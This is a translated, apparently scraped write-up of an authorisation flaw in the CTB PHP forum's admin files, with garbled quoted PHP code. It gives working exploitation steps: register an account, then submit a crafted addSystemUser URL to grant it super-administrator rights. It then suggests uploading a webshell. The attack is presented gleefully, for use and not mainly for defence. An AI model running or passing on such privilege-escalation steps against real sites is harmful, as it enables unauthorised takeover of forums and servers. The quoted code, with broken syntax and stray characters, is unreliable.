Beautiful but unsafe CTB_PHP tutorial

>>>Dedicated This Scrap To CaoJing<<<

Involved versions:
^^^^^^^
All current versions (1.3Alpha is now the highest version)

Description:
^^^^^^
CTB is an open source PHP forum developed and maintained by Shiyi Digital<11cn.org>; Due to flaws in the verification of its background management files, illegal users may directly add forum super administrators, thus threatening the security of the forum or server.

Details:
^^^^
CTB is very standard in writing, the code is well-organized and pleasing to the eye. It is indeed a beautiful program; especially its functional modules, I really learned a lot.But the security aspect is worrying:

Try the following code:

/admin/main.php
~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~
//Get the get variable
if( is_array($_GET) ) {
foreach($_GET as $k=>$v) {
if( is_array( $_GET[$k]) ) {
foreach($_GET[$k] as $k2=>$v2) {
                        $return[$k]                                                                                                                  = $v;
                                     🎜>}
...
$mod = isset($_GET['mod']) ? $_GET['mod'] : $_POST['mod'];
if (!file_exists( $mod.".php" {
$mod = "mainright";
}
require_once ($mod.".php";
//--------- -------------------------------------------------- ------------------

//Initialize class variables
$ctb = new Module;
$ctb->set = $set;
$ctb->tplPath = "./templates";
$ctb->input = $return;
$ctb->sess = isset($_COOKIE["sess_adminname"]) ? $_COOKIE : $_SESSION;
$ctb->execute();
~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~

There is no verification here, let’s look at the file to add the administrator:

/admin/systemuser.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Module extends CommonClass
//System management module subclass
{
function execute() {
switch($this->input['action']) {
...
case 'addSystemUser':
$this->addSystemUser();
break;
...
} }
}

function add SystemUser()
{
//Simple formatting of input data
$this->inputCheck("main.php?mod=systemuser&action=showSystemUser";
//Perform the add operation
$this->file = "../".$this->set[dataPath]."/users/list.php";
$systemLine = $this->select(4, $this->input['systemUserName' ]);
....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~

Still not verified, good journey!

How to use:
^^^^^^^
Register a user first:

Login ID: cat
Username: dog
Password: ilikecat
Repeat password: ilikecat
Email: cat@dog.com

Then submit the following URL:

http://www.target.com/ctb/admin/main. php?mod=systemuser&systemUserName=dog&systemUserMode=1&action=addSystemUser

Haha, you are now a super administrator, don’t believe me? Submit the following URL for backend login:

http://www.psych.com/ctb/admin/main.php?mod=login

Management name: cat
Management password: ilikecat

Hey...it really worked!

Do you want to change the background upload file type now and upload webshell? Hum, I must have guessed it...

Postscript: I also found some glaring typos in the CTB code comments, which is really embarrassing. I hope they can be corrected together.

http://www.bkjia.com/PHPjc/314678.htmlwww.bkjia.comtruehttp: //www.bkjia.com/PHPjc/314678.htmlTechArticleDedicatedThisScrapToCaoJing Involved versions: ^^^^^^^ All current versions (now 1.3Alpha is the highest version) Description: ^^^^^^ CTB is a source code developed and maintained by Shiyi Digital 11cn.org;...